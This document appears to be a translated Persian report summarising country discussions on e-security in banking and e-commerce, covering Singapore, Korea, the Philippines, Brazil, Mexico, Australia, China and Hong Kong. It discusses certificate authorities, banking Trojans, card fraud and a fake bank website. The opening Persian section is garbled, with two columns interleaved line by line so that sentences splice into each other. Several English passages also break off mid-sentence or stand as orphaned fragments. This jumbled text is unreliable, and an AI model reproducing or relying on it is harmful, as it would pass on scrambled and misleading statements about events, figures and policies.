ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ • ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻣﺮ .۱
۴۰ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۱ﺑـﻪ ۹۱ﻣﻴﻠﻴـﻮﻥ ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ
ﺩﻻﺭ ﺭﺳﻴﺪ. ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ.
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻌﺪﺍﺩ ۱۴,۰۰۰ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ • ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ،ﻭ ﺩﺭ ﻣـﻮﺭﺩ .۲
ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ
۷،۸ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ %۶۴ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ. ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ،SMSﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(.
ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ .۳
ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ
ﻧﻜﺮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻨﻬـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ •
ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ۲۴ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ
ﻧﺸﺪﻩ ﺑﻮﺩ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ )ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ.
ﻧﺸﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ %۵۰ •
ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ. ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ.
ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ
) (PKIﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ" .ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ
ﺍﺳﺖ .ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ
ﺳﺎﻝ (۱۹۹۹ﻣﺴﺌﻮﻟﻴﺖ PKIﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ۴ﻣﻴﻠﻴﻮﻧﻲ ،ﺗﻘﺮﻳﺒﹰﺎ %۲۵
ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ PKIﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﻣﺮﺍﻛـﺰ ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ.
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ٢٣١ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ. ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ.
ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ ) ٢٣٢(KISAﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ %۵۰ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ .ﺍﻣـﺎ ﺩﺭ
ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ،ﻭ ﺍﻧﺠـﺎﻡ ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ ،ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ
ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ PKIﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ ﺭﺷﺪ ﻧﻴﺴﺖ ،ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ .ﺧـﺪﻣﺎﺕ
ﺩﺍﺭﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ
ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ .ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ.
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ،ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ ،ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ
ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ
ﺗﻘﺮﻳﺒﹰﺎ ۱۰۰ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ۱۹۹۶ﻭ ۱۹۹۷
ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﺎ ﻫﺴﺘﻨﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ۵,۰۰۰ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ
ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ،ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ .ﺍﮔﺮﭼـﻪ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ .ﺍﻣﺎ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ
ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ :ﺍﺯ ۳۶ )ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ
ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ .ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ ﻣﻲﻛﻨﻨﺪ:
ﺷﻤﺮﺩ:
ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ ،ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ .۱
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ - ۱۹۹۷ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ .۱ ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ .ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ
ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ -ﺷﺮﻭﻉ ﺷﺪ .ﻟـﺬﺍ ﺍﻳـﻦ
ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ
ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ،
ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ
ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ.
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ
ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ .ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ .۲
ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ.
ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ
ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ
ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ.
)ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ.
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ .ﺩﺭ ﻣـﺎﻩ
ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ، .۲
ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ
231 Certification Authorities
232 Korean Information Security Agency
Part Three: IT Security and Organizations

In August of last year, several brokerage firms found inactive, dormant accounts that, as just one part of their activity, had bought about US$20 million in shares from investors. In response, security considerations increased and the use of accredited certification authorities became more widely mandatory. On 1 December 2002, private certificates were declared "invalid"; from then on only certificates issued by licensed certification authorities (LCAs) [233] were considered valid, and by May 2003 all certificates had to be re-validated. All brokerage firms from November 2002, and smaller institutions from January 2003 onward, were required to use certificates from licensed certification authorities for Internet commerce.

Singapore planned to publish its technology risk management guidelines in the spring of 2003. The country's activities are guided by useful industry experience, with the help of international bodies, and on the basis of summaries of various meetings between active industry banks and government officials. One of the main questions from Singapore, which has only a single standard-setting body, was how a government as large as that of the United States, with multiple standard-setting authorities, can apply its regulations in a unified way.

Philippines

The Philippine discussion focused on the results of three possible perspectives on the growing threat of cybercrime: the spread of viruses (such as the I Love You virus), the persistent theft of credit cards, and the events of September 11. The Philippine representatives used September 11 to explain their government's calculations for protecting national economic institutions.

In the Philippines, the spread of the "I Love You" virus quickly forced legal institutions to react. The incident was especially significant because it exposed the weaknesses of both government and the private sector. It also brought to light the capacity of the legal authorities to understand and respond effectively to technology-related incidents; as a result, a security training program for government staff was put in place, and in order to enter this arena the government passed e-commerce laws and a cyber strategy [234].

Credit card fraud has now become a fundamental problem in electronic financial services in the Philippines (as in every other country). The country has 2 to 3 million credit card holders, about 17 banks provide credit services for these cards, and several million electronic commercial transactions take place each year. It is estimated that about 400 million pesos (equivalent to US$8 million) in financial abuse can be attributed to credit card fraud. Automated teller machines are also widely used and have about 10 million customers across the country.

The third topic of discussion was that September 11 forced banks to work on increasing cooperation with other countries in order to improve e-security.

As elsewhere in the world, the electronic economy of the Philippines is still in the early stages of development. In this regard the Philippines has also addressed parts of the eight proposed pillars of e-security for reducing risk: linking the legal framework to enforcement methods, establishing cooperation between government and private companies, and improving the capabilities of law enforcement in the area of cybercrime. Nevertheless, the Philippines still needs skilled legal experts, especially for specialized courts. Other needs of the country include databases and training for everyone involved in financial services, including customers, merchants, and service providers.

The Filipinos raised two main questions: 1) How has the United States struck a balance between incident reporting and confidentiality? and 2) What is the place of Interpol in criminal law?
One possible definition of e-security is

All participating countries emphasized the need for extensive, cross-sectoral training in e-security, and finally
Third, the failure to report incidents is a serious obstacle to understanding the scope of existing threats, because there is still considerable reluctance to report security intrusions publicly.

Fourth, in addition to institutions' lack of interest in reporting incidents, the response time to incidents is also long in many cases.

Finally, staff continue to play a central role, and a single inexperienced user can call the security of the entire network into question; it is therefore essential to raise everyone's awareness of threats. If electronic threats are not managed properly, public trust in technology will inevitably be damaged. With these points in mind, several further steps must be taken to reach higher levels of e-security:

First, legislators, financial institutions, and other market participants should work to identify and spread e-security best practices.

Second, cooperation must become routine and permanent, with particular attention to addressing the key threats facing organizations and customers in general.

Third, training for staff and security auditors must be a high priority in business activities and in government. The definition and practical scope of risk must include the various types of cyber risk in addition to traditional forms of information and physical threats.

Oversight of Information Security and Technology Risks

As the information technology sector grows beyond the limits of local capabilities and talent, turning to outside resources for security has become common practice; the use of international resources for this purpose in particular has created both threats and opportunities for organizations around the world. The activities undertaken in recent years to reduce electronic threats can be regarded as a blessing in disguise for banks: they oblige banks to develop a response program to protect customer data against threats, and along the way they provide banks with all the necessary guidance. Such a program should also include processes for informing customers of incidents of unauthorized disclosure of information.

Despite sophisticated and innovative policies and procedures, security has still not become a simple matter, so constant care and training remain essential. Some new security areas that currently demand more attention are vulnerability assessment, penetration testing, intrusion detection systems, and cybercrime laws.

Mobile Technologies: New Achievements and Risks

In 2002, GSM had about 787 million users worldwide. Wireless technology is growing at three times the rate of land lines. Like other communication technologies, it is vulnerable to malicious code such as Trojans and viruses and to denial-of-service attacks. In the hostile environment of the Internet, wireless technology is the Achilles' heel of security; the wireless connection is usually the weakest link in the security chain. GSM vulnerabilities include SIM card vulnerabilities, SMS bombing, WAP vulnerabilities, and the attack known as "man in the middle" [236].

Although GSM technology cannot be made completely secure, a user can gain considerably more protection with a few simple steps:

• enabling the power-on password;
• installing antivirus software;
• installing a personal firewall with encryption capability;

236 In this type of attack, a modified mobile phone presents itself to other mobile phones as a fake base station, allowing the attacker to steal information. Information at gateways is entirely in the clear, without any encryption, and this exposes users and their information to major vulnerabilities.
processes do they follow to reduce e-security risks, and what changes do they plan to make to their supervisory process?

3. How can multilateral and multinational institutions help you, in cooperation with other supervisory organizations?

Brazil

The Brazilian representative noted that competition drives companies to build advanced technologies, but these technologies are prone to vulnerabilities. There is a balance between service costs on the one hand and fraud on the other. The effectiveness of examination techniques for training courses is increasing in Brazil.

In response to the question of how multinational institutions can help countries, the Brazilians wanted assistance in the following areas: conducting examinations for training courses, developing security guidelines and standards, and creating security models with a minimum of banking regulation.

Question

The Brazilians asked how, given the dynamic nature and rapid progress of technology, which makes legislation difficult, a legal infrastructure for dealing with crime can be created.

be given to the general public, because in this area blocking information only makes the problems worse. In particular, there are tremendous problems arising from the cross-sectoral nature of electronic crime, including cyber intrusions and the manipulation of banking databases. International cooperation in this area is therefore necessary.

Mexico

In response to the possible perspectives on e-security incidents, Mexico pointed out that the possibility of gaining access to PINs through the web is increasing, and that this makes the risks more serious. In any case, they are making considerable efforts to reduce electronic risks; financial institutions have strong control capacities, and there are many security and auditing companies with expertise in information technology. In addition, Mexico has taken the BASEL recommendations into account for controlling technology risks.

In response to the third question, the Mexicans proposed that, in order to share experiences, assessments, and needs, information be exchanged globally among the various organizations.
was the use of internal control and reporting mechanisms. For example, incident reporting by bank officers is essential to a bank's safety. To support incident response capacity, a computer security emergency response center has been established in Ukraine.

Answer

On the subject of court-admissible evidence, it was pointed out that electronic data are subject to rapid destruction and that there is no standard for legal evidence in the field of computer crime. Although the world needs guidelines for digital forensic investigation, at present there is no standard method accepted by the courts.

Australia has selected and implemented BASEL2 for classifying information. However, they have found that making ever greater use of intrusion detection systems is not easy, given the many false positives and untuned systems. New technologies are built on top of earlier ones, and this adds to the complexity and interdependence of systems. At the same time, the way systems work may not be well documented. Learning how systems depend on one another is vital, but the available documentation is usually very limited. The Australian representative noted that in that country free training materials on general and specialized topics are available for download.

Australia raised three main points.

First, by October 2003 all APEC member countries will have cybercrime laws in place, covering matters such as electronic fraud and cross-sectoral and international enforcement of electronic laws.

Second, training and cooperation in law enforcement are needed at all levels, and information technology standards will be covered briefly in these courses. The APEC cybersecurity program will also address wireless technology and will briefly cover the risks of technologies such as Wi-Fi.

Third, by the end of October 2003 computer security emergency response centers will be established in all APEC member countries.

China, Beijing

The Chinese representative stated that public awareness of the importance of e-security must increase, and that more external assessments are needed to achieve this. One of the main problems China faces in e-security is the lack of awareness and of management ability to assess risks (especially given the complex nature of the technologies). This problem in China, because of weak cooperation among centers

Despite the unfavorable security situation, Internet banks in China are growing rapidly. The number of such banks rose from one to twenty-seven between 1999 and 2003, and the volume of banking activity grew more than 100-fold. It was noted that Internet banking flourished during the SARS outbreak. Finally, China made the following proposals:

1. Encourage information sharing at national and international levels
2. Create international e-security standards
3. Increase transparency in electronic banking

China, Hong Kong

In Hong Kong, forged e-mail, viruses, and worms are very common. Alongside these problems, the behavior of attackers has also changed: instead of targeting banks directly, attackers have targeted the weakest link, namely the customer, so customer education is vital.

A recent incident involving the website of a fake bank made the security problems more evident. The bank had placed an incomplete postal address on its website and did not use a digital certificate; it also claimed to have offices in New York and elsewhere. Investigations showed that both the website (which was hosted in China) and the claimed bank were fake. The incident once again revealed the vital need for cross-sectoral cooperation, particularly because cyber criminals themselves operate across sectors.

Hong Kong is preparing the groundwork for customer oversight and education, such as publishing guides to raise public awareness of the critical aspects of e-security and issuing alerts to counter computer crime. To improve oversight in e-security, it maintains a close relationship with domain registrars [240] and uses an automated process to control local domain names (.hk): if the word "bank" or any variant of it is used in a domain name, the matter is immediately referred to the competent authorities for review. The police, the computer security emergency response center, and the Hong Kong government also cooperate with various bodies at the international level to build rapid incident response capability. A control self-assessment (CSA) [241] system exists in about 70 to 80 banks, and because of the particular difficulties of annual assessment, this assessment is also carried out automatically.

Republic of Korea

